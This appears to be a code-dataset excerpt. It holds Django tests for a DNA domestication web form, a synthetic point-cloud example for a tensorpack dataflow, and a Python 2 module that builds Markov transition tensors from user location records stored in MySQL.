                                          'Vector': 'pDGB1_omega1',
                                          'name': 'aa',
                                          'description': '',
                                          'reference': 'aa'})
        # A successful creation answers with a redirect.
        assert resp.status_code == 302
class DomesticationViewTest(TestCase):
    """Integration tests for the domestication views.

    Fix over the previous revision: every ``open(...)`` handle posted to
    the form is now closed via ``with`` instead of being leaked.
    """
    fixtures = FIXTURES_TO_LOAD
    multi_db = True

    def test_domestication(self):
        """Exercise every validation branch of the domestication form."""
        client = Client()
        url = reverse('domestication_view')
        # The empty form lists the available categories.
        response = client.get(url)
        assert ("""<option value="NTAG (B2)">NTAG (B2)</option>""") in str(response)
        gb_path = os.path.join(TEST_DATA, 'domseq.gb')
        # seq + category: this sequence fails the category validators.
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'category': 'NTAG (B2)'})
        assert """<ul class="errorlist"><li>The provided s""" in str(response)
        # No sequence at all.
        response = client.post(url, {'seq': '',
                                     'category': 'NTAG (B2)'})
        assert """<ul class="errorlist"><li>Fasta or genbank File Required</li></ul>""" in str(response)
        # Category together with prefix and suffix is rejected.
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'prefix': 'ggac', 'suffix': 'cgtc',
                                         'category': '3UTR+TERM (B6-C1)'})
        assert """<ul class="errorlist"><li>Can not use category and prefix/suffix simoultaneously</li></ul>""" in str(response)
        # Category together with only a suffix is rejected as well.
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'prefix': '', 'suffix': 'cgtc',
                                         'category': '3UTR+TERM (B6-C1)'})
        assert """<ul class="errorlist"><li>Can not use category and prefix/suffix simoultaneously</li></ul>""" in str(response)
        # A suffix without its prefix.
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'prefix': '', 'suffix': 'cgtc',
                                         'category': ''})
        assert """<ul class="errorlist"><li>You must provide prefix and suffix together</li></ul>""" in str(response)
        # Neither category nor a prefix/suffix pair.
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'prefix': '', 'suffix': '',
                                         'category': ''})
        assert """<ul class="errorlist"><li>At least we need category or prefix/suffix pair</li></ul>""" in str(response)
        # Category-specific validators are applied.
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'category': 'CDS (B3-B4-B5)'})
        assert 'The provided seq must start with start' in str(response)
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'category': 'goi (B2-B3)'})
        assert 'The provided seq must have less' in str(response)
        # A sequence that does start with ATG passes the start check.
        fasta_path = os.path.join(TEST_DATA, 'domseqatg.fasta')
        with open(fasta_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'category': 'SP (B3)'})
        assert 'The provided seq must start with start' not in str(response)
        # Domestication with an explicit prefix/suffix pair.
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'suffix': 'ACCT', 'prefix': 'TTCC'})
        assert "<p>Prefix:TTCC</p>" in str(response)
        # Raw residues are validated like an uploaded sequence.
        with open(gb_path) as gb_fhand:
            residues = str(SeqIO.read(gb_fhand, format='gb').seq)
        response = client.post(url, {'residues': residues,
                                     'category': 'CDS (B3-B4-B5)'})
        assert 'The provided seq must start with start' in str(response)

    def test_genbank_view(self):
        """The domestication GenBank endpoint renders a GenBank file."""
        client = Client()
        url = reverse('domestication_view_genbank')
        response = client.get(url)
        assert response.status_code == 400
        response = client.post(url, {'seq': 'gagaggggggggagagagattcccctctccccccccccccccccccccccccccccccccccccctttgacctcgaaacgccccc',
                                     'prefix': 'ggag',
                                     'suffix': 'aatg',
                                     'category': 'PROM+5UTR+NTAG (A1-A2-A3-B1-B2)',
                                     'seq_name': 'test',
                                     'with_intron': '0'})
        assert 'LOCUS' in str(response)

    def test_protocol_view(self):
        """The domestication protocol endpoint renders a protocol file."""
        client = Client()
        url = reverse('domestication_view_protocol')
        response = client.get(url)
        assert response.status_code == 400
        response = client.post(url, {'seq': 'gagaggggggggagagagattcccctctccccccccccccccccctccccccccccccccccccccccccccctttgacctcgaaacgccccc',
                                     'prefix': 'ggag',
                                     'suffix': 'aatg',
                                     'category': 'PROM+5UTR+NTAG (A1-A2-A3-B1-B2)',
                                     'seq_name': 'test',
                                     'with_intron': '0'})
        assert "Oligo forward: GCGCCGTCTCGCTCGGGAGGAGAGGGGGGGGAGAGAGAT" in str(response)
| en | 0.58667 | # Copyright 2013 <NAME>, Univ.Politecnica Valencia, Consejo Superior de # Investigaciones Cientificas # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # test of the form # test of the form with blanck values # test of the form with wrong type # vector does not exist # test of the form with wrong type # test of the form page # test of the form # no login, no access # show form # add a feature # TODO url to genbank file # response = client.get('/media/genbank_files/pAn11.gb') # add a feature # reverse vector # with more than one part of the same type # with more than one part of the same type # with more than one part of the same type <p><label for="id_TER">Ter:</label> <select id="id_TER" maxlength="100" name="TER"> <option value="pDGB1_alpha1R">pDGB1_alpha # print response <ul class="errorlist"><li>This field is required.</li></ul <ul class="errorlist"><li>This feature does not exist in # forward vector # reverse vector # do initial <option value="GB0125">GB0125 - pEGB 35S:Rosea:Tnos</option> # do page 1 <p><label for="id_part_2">Part 2:</label> # do page 2 # do page 3 <INPUT type="hidden" name="Vector" value="pDGB1_omega1"> <p>The resulted sequence of the assembly is # forward vector # check bipartite_view_genbank # check bipartite_view_protocol # check bipartite_view_add # do initial <option value="NTAG (B2)">NTAG (B2)</option> # send data to formulary to test validations # add seq and category # print str(response) <ul class="errorlist"><li>The provided s # not 
add a sequence <ul class="errorlist"><li>Fasta or genbank File Required</li></ul> # add category, prefix and suffix <ul class="errorlist"><li>Can not use category and prefix/suffix simoultaneously</li></ul> # add category and suffix <ul class="errorlist"><li>Can not use category and prefix/suffix simoultaneously</li></ul> # add suffix <ul class="errorlist"><li>You must provide prefix and suffix together</li></ul> # not add category nor prefix and suffix <ul class="errorlist"><li>At least we need category or prefix/suffix pair</li></ul> # check that uses validators # sequence start with atg # domesticate with prefix and suffix # check bipartite_view_protocol | 2.094356 | 2 |
points2mesh/idiss_toy_example.py | Hyde46/pc2mesh | 0 | 6617429 | <reponame>Hyde46/pc2mesh
import tensorflow as tf
import numpy as np
from tensorpack import *
from tensorpack.input_source import QueueInput
from tensorpack.dataflow import (PrintData, BatchData)
from wrs_df import *
from tabulate import tabulate
from scipy.spatial.distance import pdist, squareform
# Seed both numpy's and TensorFlow's RNGs so runs are reproducible.
np.random.seed(42)
tf.set_random_seed(42)
class FakePointCloud(object):
    """Randomly generated point cloud for exercising the pipeline.

    Holds per-point positions (B x Dp x N), input features
    (B x Din x N) and a K-nearest-neighbour index table (B x K x N)
    computed from Euclidean distances between points.
    """

    def __init__(self, B, N, K, Din, Dout, Dp, N2=1, scaling=1):
        super(FakePointCloud, self).__init__()
        # There must be fewer requested neighbours than points.
        assert K < N
        self.B = B
        self.N = N
        self.K = K
        self.Din = Din
        self.Dout = Dout
        self.Dp = Dp
        self.N2 = N2
        # Arrays are drawn as float32 noise but stored as float64.
        store_type = np.float64

        def draw(shape):
            # Standard-normal noise truncated to float32 first.
            return np.random.randn(*shape).astype(np.float32)

        self.theta = draw([1, self.Dp, self.Din, self.Dout]).astype(store_type)
        self.bias = draw([self.Din, self.Dout]).astype(store_type)
        self.position = draw([self.B, self.Dp, self.N]).astype(store_type)
        self.features = draw([self.B, self.Din, self.N]).astype(store_type)
        self.neighborhood = self._nearest_neighbors(
            self.position, self.K).astype(dtype=np.int32)

    @staticmethod
    def _nearest_neighbors(positions, K):
        """Return a (B, K, N) table of the K nearest point indices.

        For distinct points the closest neighbour of a point is the
        point itself (distance zero sorts first).
        """
        per_batch = []
        for cloud in positions:  # cloud is (Dp, N); points are columns
            dist = squareform(pdist(cloud.T, 'euclidean'))
            per_batch.append(np.argsort(dist, axis=1)[:, :K])
        return np.array(per_batch).transpose(0, 2, 1)

    def init_ops(self, dtype=np.float32):
        """Mirror the numpy arrays as TensorFlow constant tensors."""
        for attr in ('theta', 'bias', 'features', 'position'):
            tensor = tf.convert_to_tensor(getattr(self, attr).astype(dtype))
            setattr(self, attr + '_op', tensor)
        self.neighborhood_op = tf.convert_to_tensor(self.neighborhood)

    def expected_feature_shape(self):
        """Shape of the input feature tensor."""
        return [self.B, self.Din, self.N]

    def expected_output_shape(self):
        """Shape of the output feature tensor."""
        return [self.B, self.Dout, self.N]
def fake_pc_loader():
    """Generator yielding one synthetic (position, features) sample.

    A fresh FakePointCloud is drawn; its TF constant ops are created as
    a side effect before the numpy arrays are handed out.
    """
    cloud = FakePointCloud(B=1, N=6, K=3, Din=3, Dout=3, Dp=3)
    cloud.init_ops(dtype=np.float32)
    # Stack the positions and the shifted features into one array.
    yield np.array([cloud.position, cloud.features + 10])
if __name__ == '__main__':
    # Build a one-sample synthetic point-cloud dataflow and dump the
    # tensors produced by the weighted-random-sampling stage.
    # Fix: parenthesised single-argument print calls (valid on both
    # Python 2 and 3, identical output); dead commented-out debugging
    # code removed.
    df = DataFromGenerator(fake_pc_loader)
    df = WRSDataFlow(
        df, neighborhood_sizes=3, sample_sizes=[6, 3])
    df.reset_state()
    for d in df:
        # NOTE(review): indices 2/3 and 6/7 presumably hold the
        # per-level neighbourhood/sample tensors emitted by
        # WRSDataFlow -- confirm against its output layout.
        print(d[2])
        print(d[3])
        print(" ")
        print(d[6])
        print(d[7])
        print(" ")
| import tensorflow as tf
import numpy as np
from tensorpack import *
from tensorpack.input_source import QueueInput
from tensorpack.dataflow import (PrintData, BatchData)
from wrs_df import *
from tabulate import tabulate
from scipy.spatial.distance import pdist, squareform
# Seed both numpy's and TensorFlow's RNGs so runs are reproducible.
np.random.seed(42)
tf.set_random_seed(42)
class FakePointCloud(object):
    """Randomly generated point cloud for exercising the pipeline.

    Holds per-point positions (B x Dp x N), input features
    (B x Din x N) and a K-nearest-neighbour index table (B x K x N)
    computed from Euclidean distances between points.
    """

    def __init__(self, B, N, K, Din, Dout, Dp, N2=1, scaling=1):
        super(FakePointCloud, self).__init__()
        # There must be fewer requested neighbours than points.
        assert K < N
        self.B = B
        self.N = N
        self.K = K
        self.Din = Din
        self.Dout = Dout
        self.Dp = Dp
        self.N2 = N2
        # Arrays are drawn as float32 noise but stored as float64.
        store_type = np.float64

        def draw(shape):
            # Standard-normal noise truncated to float32 first.
            return np.random.randn(*shape).astype(np.float32)

        self.theta = draw([1, self.Dp, self.Din, self.Dout]).astype(store_type)
        self.bias = draw([self.Din, self.Dout]).astype(store_type)
        self.position = draw([self.B, self.Dp, self.N]).astype(store_type)
        self.features = draw([self.B, self.Din, self.N]).astype(store_type)
        self.neighborhood = self._nearest_neighbors(
            self.position, self.K).astype(dtype=np.int32)

    @staticmethod
    def _nearest_neighbors(positions, K):
        """Return a (B, K, N) table of the K nearest point indices.

        For distinct points the closest neighbour of a point is the
        point itself (distance zero sorts first).
        """
        per_batch = []
        for cloud in positions:  # cloud is (Dp, N); points are columns
            dist = squareform(pdist(cloud.T, 'euclidean'))
            per_batch.append(np.argsort(dist, axis=1)[:, :K])
        return np.array(per_batch).transpose(0, 2, 1)

    def init_ops(self, dtype=np.float32):
        """Mirror the numpy arrays as TensorFlow constant tensors."""
        for attr in ('theta', 'bias', 'features', 'position'):
            tensor = tf.convert_to_tensor(getattr(self, attr).astype(dtype))
            setattr(self, attr + '_op', tensor)
        self.neighborhood_op = tf.convert_to_tensor(self.neighborhood)

    def expected_feature_shape(self):
        """Shape of the input feature tensor."""
        return [self.B, self.Din, self.N]

    def expected_output_shape(self):
        """Shape of the output feature tensor."""
        return [self.B, self.Dout, self.N]
def fake_pc_loader():
for k in range(1):
pc = FakePointCloud(B=1, N=6, K=3, Din=3, Dout=3, Dp=3)
pc.init_ops(dtype=np.float32)
yield np.array([pc.position, pc.features+10])
if __name__ == '__main__':
# Generate point cloud
df = DataFromGenerator(fake_pc_loader)
df = WRSDataFlow(
df, neighborhood_sizes=3, sample_sizes=[6, 3])
df.reset_state()
for d in df:
# kdt_coarse = KDTree(d[0], leaf_size=16, metric='euclidean')
# kdt_sparse = KDTree(d[4], leaf_size=16, metric='euclidean')
# neighborhood = kdt_sparse.query(
# kdt_coarse.data, k = 4, dualtree = False, return_distance = False)
# print d[0]
# print d[1]
print d[2]
print d[3]
print " "
# print d[4]
# print d[5]
print d[6]
print d[7]
print " "
'''
# print d[8]
print d[9]
print d[10]
print d[11]
print ""
print ""
''' | en | 0.499295 | docstring for FakePointCloud # B, Dpos, N # Generate point cloud # kdt_coarse = KDTree(d[0], leaf_size=16, metric='euclidean') # kdt_sparse = KDTree(d[4], leaf_size=16, metric='euclidean') # neighborhood = kdt_sparse.query( # kdt_coarse.data, k = 4, dualtree = False, return_distance = False) # print d[0] # print d[1] # print d[4] # print d[5] # print d[8] print d[9] print d[10] print d[11] print "" print "" | 2.21397 | 2 |
utils/mobility.py | pengyuan/markov2tensor | 1 | 6617430 | <reponame>pengyuan/markov2tensor<gh_stars>1-10
#!/usr/bin/env python
# coding: UTF-8
"""
gowalla_filter:
SELECT user,COUNT(unkown) as loc,COUNT(DISTINCT unkown) as distinct_loc,COUNT(unkown)/COUNT(DISTINCT unkown) as ratio FROM raw a GROUP BY `user` ORDER BY ratio desc;
找出那些比率(所有地点/不同地点)合适的用户
所有地点决定了tensor的稀疏度;不同地点决定了tensor的dimensionality
eg:找到了用户id为147986的所有记录,并将unknow一栏替换为字母(为了方便分析)
"""
from __future__ import division
import MySQLdb
from scipy import linalg
import numpy as np
from numpy.matlib import eye, identity
from preprocess import settings
__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright (c) 2014 <NAME>'
__license__ = 'Public domain'
#连接数据库
def init_data(users, train = 1):
conn = MySQLdb.connect(host = settings.HOST, user = settings.USER, passwd = settings.PASSWORD, db=settings.DB)
cursor = conn.cursor()
result = 0
#得到用户所有位置移动信息,按时间排序
#select distinct poi_name from staypoint where user_id in (0,3,4,5,30) and province = '北京市' and district = "海淀区";
try:
if len(users) == 1:
sql = "select distinct(poi_name) from staypoint where user_id = "+ str(users[0]) +" and province = '北京市' and district = '海淀区' order by id"
else:
sql = "select distinct(poi_name) from staypoint where user_id in "+ users.__str__() +" and province = '北京市' and district = '海淀区' order by id"
print sql
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
#print len(result)
pois_axis = {}
axis_pois = {}
index = 0
for item in result:
pois_axis[item] = index
axis_pois[index] = item
index += 1
datas = {}
predicts = {}
recommends = {}
for user in users:
try:
sql = "select poi_name from staypoint where user_id = "+ str(user) +" and province = '北京市' and district = '海淀区' order by id"
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
data = []
length = int(len(result) * train)
train_data = result[:length]
remain_data = result[length:]
for item in train_data:
data.append(pois_axis[item])
train_set = set(train_data)
predict = []
recommend = []
for item in remain_data:
if item in train_set:
predict.append(pois_axis[item])
else:
recommend.append(pois_axis[item])
datas[user] = data
predicts[user] = predict
recommends[user] = recommend
cursor.close()
conn.close()
# print pois_axis
# print axis_pois
# print datas
return axis_pois, datas, predicts, recommends
# 连接数据库
'''strategy 1: arrival_slot; 2: existance'''
def init_data2(users, train, time_slice):
conn = MySQLdb.connect(host = settings.HOST, user = settings.USER, passwd = settings.PASSWORD, db=settings.DB)
cursor = conn.cursor()
result = 0
#得到用户所有位置移动信息,按时间排序
#select distinct poi_name from staypoint where user_id in (0,3,4,5,30) and province = '北京市' and district = "海淀区";
try:
if len(users) == 1:
sql = "select distinct(poi_name) from staypoint where user_id = "+ str(users[0]) +" and province = '北京市' and district = '海淀区' order by id"
else:
sql = "select distinct(poi_name) from staypoint where user_id in "+ users.__str__() +" and province = '北京市' and district = '海淀区' order by id"
print sql
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
# print len(result)
pois_axis = {}
axis_pois = {}
index = 0
for item in result:
pois_axis[item[0]] = index
axis_pois[index] = item[0]
index += 1
datas = {}
predicts = {}
recommends = {}
# trains = {}
time_slot = range(0, time_slice)
for user in users:
try:
# sql = "select poi_name from staypoint where user_id = "+ str(user) +" and province = '北京市' and district = '海淀区' and arrival_timestamp % 86400 div 3600 = "+str(slot)
sql = "select poi_name, arrival_timestamp from staypoint where user_id = "+ str(user) +" and province = '北京市' and district = '海淀区' order by id"
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
data = {}
for slot in time_slot:
data[slot] = []
length = int(len(result) * train)
train_data = result[:length]
remain_data = result[length:]
# train_data_list = []
for item in train_data:
# print data.keys()
index = item[1] % 86400 // (3600 * (24 // time_slice))
# print type(index)
# print data.has_key(index)
data[index].append(pois_axis[item[0]])
# train_data_list.append(pois_axis[item[0]])
datas[user] = data
# train_set = set(train_data_list)
# print "trainset: ", train_set
predict = {}
recommend = {}
for slot in time_slot:
recommend[slot] = set()
predict[slot] = set()
for item in remain_data:
axis = pois_axis[item[0]]
index = item[1] % 86400 // (3600 * (24 // time_slice))
if axis in set(data[index]):
predict[index].add(pois_axis[item[0]])
else:
recommend[index].add(pois_axis[item[0]])
predicts[user] = predict
recommends[user] = recommend
# trains[user] = train_set
cursor.close()
conn.close()
# print pois_axis
# print axis_pois
# print datas
return axis_pois, datas, predicts, recommends
# 从线性停留点序列计算马儿可夫转移矩阵或转移张量
def trans(data, dimensionality, order):
# 得到停留点序列长度
data_length = len(data)
if order == 2:
tensor = [[0 for i in range(dimensionality)] for j in range(dimensionality)]
for index in range(data_length-1):
check_list = data[index:index+2]
tensor[check_list[0]][check_list[1]] += 1
for item in range(dimensionality):
count_sum = 0
for item2 in range(dimensionality):
count_sum += tensor[item][item2]
if 0 == count_sum:
continue
else:
for item3 in range(dimensionality):
tensor[item][item3] = tensor[item][item3] / count_sum
elif order == 3:
# 三维数组,元素初始化为零
tensor = [[[0 for i in range(dimensionality)] for j in range(dimensionality)] for k in range(dimensionality)]
for index in range(data_length-2):
check_list = data[index:index+3]
tensor[check_list[0]][check_list[1]][check_list[2]] += 1
for item in range(dimensionality):
for item2 in range(dimensionality):
count_sum = 0
for item3 in range(dimensionality):
count_sum += tensor[item][item2][item3]
if 0 == count_sum:
continue
else:
for item4 in range(dimensionality):
tensor[item][item2][item4] = tensor[item][item2][item4] / count_sum
return tensor
# 从线性停留点序列统计用户-时间-频数
def trans2(data_map, poi_dimension, users, time_slice):
user_dimension = len(users)
# 三维数组,元素初始化为零
tensor = [[[0 for poi in range(poi_dimension)] for time in range(0, time_slice)] for user in range(user_dimension)]
print np.array(tensor).shape
for key in data_map.keys():
data = data_map[key]
for slot in range(0, time_slice):
poi_list = data[slot]
for poi in poi_list:
tensor[users.index(key)][slot][poi] += 1
# for item in range(dimensionality):
# for item2 in range(dimensionality):
# count_sum = 0
# for item3 in range(dimensionality):
# count_sum += tensor[item][item2][item3]
# if 0 == count_sum:
# continue
# else:
# for item4 in range(dimensionality):
# tensor[item][item2][item4] = tensor[item][item2][item4] / count_sum
return tensor
def is_contain_zero(vector):
length = len(vector)
while(True):
if vector[length-1] == 0:
length -= 1
else:
break
return vector.any(0), length-1
def matrix_sn_nn(res):
# # print tensor[:-1]
# x = np.array(matrix)
#
# # sum(1) 按行求和
# print "sum: ", x.sum(1)
#
# U, s, Vh = linalg.svd(matrix, full_matrices=True)
# # print type(s)
#
# # print U
# U2 = U[:, :]
# # print U2
#
# V2 = Vh[:, :]
#
# s = s[:]
# S = np.diag(s)
# # print S
#
# # S = linalg.diagsvd(s, 6, 6)
# # print np.allclose(tensor, np.dot(U, np.dot(S, Vh)))
#
# print np.allclose(matrix, np.dot(U2, np.dot(S, V2)))
#
# temp = U2.transpose().sum(1)
# print "temp1: ", temp.shape
# temp = np.array([temp]).transpose()
# print "temp2: ", temp.shape
#
# # print type(temp)
# # print identity(4)
# #
# #
# # print type(eye(4))
# # print eye(4).shape[1]
#
# flag, num = is_contain_zero(temp)
# nr = U2.shape[1]
#
# print "is_contains_zero: ", flag, num
#
# if flag:
# print nr, num, type(np.zeros((nr, num-1))), type(temp)
# print np.zeros((nr, num-1)).shape
# print temp.shape, np.ones((nr, 1)).shape
#
# print np.sum([[0, 1], [0, 5]], axis=1)
#
#
# temp_matrix = np.concatenate((np.zeros((nr, num-1)), temp-np.ones((nr, 1))), 1)
# sigma = identity(nr) + np.concatenate((temp_matrix, np.zeros((nr, nr-num))), 1)
# else:
# sigma = np.diag(temp)
#
# res = U2.dot(sigma)
print "res1: ", res
res = np.array(res)
nc = res.shape[1]
res_min = res.min()
# print np.transpose(S)
if res_min >= -1:
param = 1
else:
param = 1/abs(res_min)
param_matrix = (1/(nc+param))*(np.ones((nc, nc)) + param * eye(nc))
result = res.dot(param_matrix)
print result.sum(1)
return np.array(result)#, sigma, param_matrix
if __name__ == '__main__':
# init_data((0, 3, 4, 5, 30))
#res, sigma, param = matrix_sn_nn([[2**0.5/2, -2**0.5/2], [2**0.5/2, 2**0.5/2]])
#res, sigma, param = matrix_sn_nn([[0.2, 0.8], [0.3, 0.7]])
# print "res2: ", res,res[0][0],res[0][1]
# print "sigma: ", sigma
# print "param: ", param.dot(np.linalg.inv(param))
# res = matrix_sn_nn([[0.1, 0.2, 0.3, 0.4], [0.3, 0.6, 0.05, 0.05]])
res = matrix_sn_nn([[-0.1, 0.2, 0.5, 0.5], [0.3, 0.6, 0.1, 0]])
print "res2:", res | #!/usr/bin/env python
# coding: UTF-8
"""
gowalla_filter:
SELECT user,COUNT(unkown) as loc,COUNT(DISTINCT unkown) as distinct_loc,COUNT(unkown)/COUNT(DISTINCT unkown) as ratio FROM raw a GROUP BY `user` ORDER BY ratio desc;
找出那些比率(所有地点/不同地点)合适的用户
所有地点决定了tensor的稀疏度;不同地点决定了tensor的dimensionality
eg:找到了用户id为147986的所有记录,并将unknow一栏替换为字母(为了方便分析)
"""
from __future__ import division
import MySQLdb
from scipy import linalg
import numpy as np
from numpy.matlib import eye, identity
from preprocess import settings
__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright (c) 2014 <NAME>'
__license__ = 'Public domain'
#连接数据库
def init_data(users, train = 1):
conn = MySQLdb.connect(host = settings.HOST, user = settings.USER, passwd = settings.PASSWORD, db=settings.DB)
cursor = conn.cursor()
result = 0
#得到用户所有位置移动信息,按时间排序
#select distinct poi_name from staypoint where user_id in (0,3,4,5,30) and province = '北京市' and district = "海淀区";
try:
if len(users) == 1:
sql = "select distinct(poi_name) from staypoint where user_id = "+ str(users[0]) +" and province = '北京市' and district = '海淀区' order by id"
else:
sql = "select distinct(poi_name) from staypoint where user_id in "+ users.__str__() +" and province = '北京市' and district = '海淀区' order by id"
print sql
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
#print len(result)
pois_axis = {}
axis_pois = {}
index = 0
for item in result:
pois_axis[item] = index
axis_pois[index] = item
index += 1
datas = {}
predicts = {}
recommends = {}
for user in users:
try:
sql = "select poi_name from staypoint where user_id = "+ str(user) +" and province = '北京市' and district = '海淀区' order by id"
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
data = []
length = int(len(result) * train)
train_data = result[:length]
remain_data = result[length:]
for item in train_data:
data.append(pois_axis[item])
train_set = set(train_data)
predict = []
recommend = []
for item in remain_data:
if item in train_set:
predict.append(pois_axis[item])
else:
recommend.append(pois_axis[item])
datas[user] = data
predicts[user] = predict
recommends[user] = recommend
cursor.close()
conn.close()
# print pois_axis
# print axis_pois
# print datas
return axis_pois, datas, predicts, recommends
# 连接数据库
'''strategy 1: arrival_slot; 2: existance'''
def init_data2(users, train, time_slice):
conn = MySQLdb.connect(host = settings.HOST, user = settings.USER, passwd = settings.PASSWORD, db=settings.DB)
cursor = conn.cursor()
result = 0
#得到用户所有位置移动信息,按时间排序
#select distinct poi_name from staypoint where user_id in (0,3,4,5,30) and province = '北京市' and district = "海淀区";
try:
if len(users) == 1:
sql = "select distinct(poi_name) from staypoint where user_id = "+ str(users[0]) +" and province = '北京市' and district = '海淀区' order by id"
else:
sql = "select distinct(poi_name) from staypoint where user_id in "+ users.__str__() +" and province = '北京市' and district = '海淀区' order by id"
print sql
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
# print len(result)
pois_axis = {}
axis_pois = {}
index = 0
for item in result:
pois_axis[item[0]] = index
axis_pois[index] = item[0]
index += 1
datas = {}
predicts = {}
recommends = {}
# trains = {}
time_slot = range(0, time_slice)
for user in users:
try:
# sql = "select poi_name from staypoint where user_id = "+ str(user) +" and province = '北京市' and district = '海淀区' and arrival_timestamp % 86400 div 3600 = "+str(slot)
sql = "select poi_name, arrival_timestamp from staypoint where user_id = "+ str(user) +" and province = '北京市' and district = '海淀区' order by id"
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
data = {}
for slot in time_slot:
data[slot] = []
length = int(len(result) * train)
train_data = result[:length]
remain_data = result[length:]
# train_data_list = []
for item in train_data:
# print data.keys()
index = item[1] % 86400 // (3600 * (24 // time_slice))
# print type(index)
# print data.has_key(index)
data[index].append(pois_axis[item[0]])
# train_data_list.append(pois_axis[item[0]])
datas[user] = data
# train_set = set(train_data_list)
# print "trainset: ", train_set
predict = {}
recommend = {}
for slot in time_slot:
recommend[slot] = set()
predict[slot] = set()
for item in remain_data:
axis = pois_axis[item[0]]
index = item[1] % 86400 // (3600 * (24 // time_slice))
if axis in set(data[index]):
predict[index].add(pois_axis[item[0]])
else:
recommend[index].add(pois_axis[item[0]])
predicts[user] = predict
recommends[user] = recommend
# trains[user] = train_set
cursor.close()
conn.close()
# print pois_axis
# print axis_pois
# print datas
return axis_pois, datas, predicts, recommends
# 从线性停留点序列计算马儿可夫转移矩阵或转移张量
def trans(data, dimensionality, order):
# 得到停留点序列长度
data_length = len(data)
if order == 2:
tensor = [[0 for i in range(dimensionality)] for j in range(dimensionality)]
for index in range(data_length-1):
check_list = data[index:index+2]
tensor[check_list[0]][check_list[1]] += 1
for item in range(dimensionality):
count_sum = 0
for item2 in range(dimensionality):
count_sum += tensor[item][item2]
if 0 == count_sum:
continue
else:
for item3 in range(dimensionality):
tensor[item][item3] = tensor[item][item3] / count_sum
elif order == 3:
# 三维数组,元素初始化为零
tensor = [[[0 for i in range(dimensionality)] for j in range(dimensionality)] for k in range(dimensionality)]
for index in range(data_length-2):
check_list = data[index:index+3]
tensor[check_list[0]][check_list[1]][check_list[2]] += 1
for item in range(dimensionality):
for item2 in range(dimensionality):
count_sum = 0
for item3 in range(dimensionality):
count_sum += tensor[item][item2][item3]
if 0 == count_sum:
continue
else:
for item4 in range(dimensionality):
tensor[item][item2][item4] = tensor[item][item2][item4] / count_sum
return tensor
# 从线性停留点序列统计用户-时间-频数
def trans2(data_map, poi_dimension, users, time_slice):
user_dimension = len(users)
# 三维数组,元素初始化为零
tensor = [[[0 for poi in range(poi_dimension)] for time in range(0, time_slice)] for user in range(user_dimension)]
print np.array(tensor).shape
for key in data_map.keys():
data = data_map[key]
for slot in range(0, time_slice):
poi_list = data[slot]
for poi in poi_list:
tensor[users.index(key)][slot][poi] += 1
# for item in range(dimensionality):
# for item2 in range(dimensionality):
# count_sum = 0
# for item3 in range(dimensionality):
# count_sum += tensor[item][item2][item3]
# if 0 == count_sum:
# continue
# else:
# for item4 in range(dimensionality):
# tensor[item][item2][item4] = tensor[item][item2][item4] / count_sum
return tensor
def is_contain_zero(vector):
length = len(vector)
while(True):
if vector[length-1] == 0:
length -= 1
else:
break
return vector.any(0), length-1
def matrix_sn_nn(res):
# # print tensor[:-1]
# x = np.array(matrix)
#
# # sum(1) 按行求和
# print "sum: ", x.sum(1)
#
# U, s, Vh = linalg.svd(matrix, full_matrices=True)
# # print type(s)
#
# # print U
# U2 = U[:, :]
# # print U2
#
# V2 = Vh[:, :]
#
# s = s[:]
# S = np.diag(s)
# # print S
#
# # S = linalg.diagsvd(s, 6, 6)
# # print np.allclose(tensor, np.dot(U, np.dot(S, Vh)))
#
# print np.allclose(matrix, np.dot(U2, np.dot(S, V2)))
#
# temp = U2.transpose().sum(1)
# print "temp1: ", temp.shape
# temp = np.array([temp]).transpose()
# print "temp2: ", temp.shape
#
# # print type(temp)
# # print identity(4)
# #
# #
# # print type(eye(4))
# # print eye(4).shape[1]
#
# flag, num = is_contain_zero(temp)
# nr = U2.shape[1]
#
# print "is_contains_zero: ", flag, num
#
# if flag:
# print nr, num, type(np.zeros((nr, num-1))), type(temp)
# print np.zeros((nr, num-1)).shape
# print temp.shape, np.ones((nr, 1)).shape
#
# print np.sum([[0, 1], [0, 5]], axis=1)
#
#
# temp_matrix = np.concatenate((np.zeros((nr, num-1)), temp-np.ones((nr, 1))), 1)
# sigma = identity(nr) + np.concatenate((temp_matrix, np.zeros((nr, nr-num))), 1)
# else:
# sigma = np.diag(temp)
#
# res = U2.dot(sigma)
print "res1: ", res
res = np.array(res)
nc = res.shape[1]
res_min = res.min()
# print np.transpose(S)
if res_min >= -1:
param = 1
else:
param = 1/abs(res_min)
param_matrix = (1/(nc+param))*(np.ones((nc, nc)) + param * eye(nc))
result = res.dot(param_matrix)
print result.sum(1)
return np.array(result)#, sigma, param_matrix
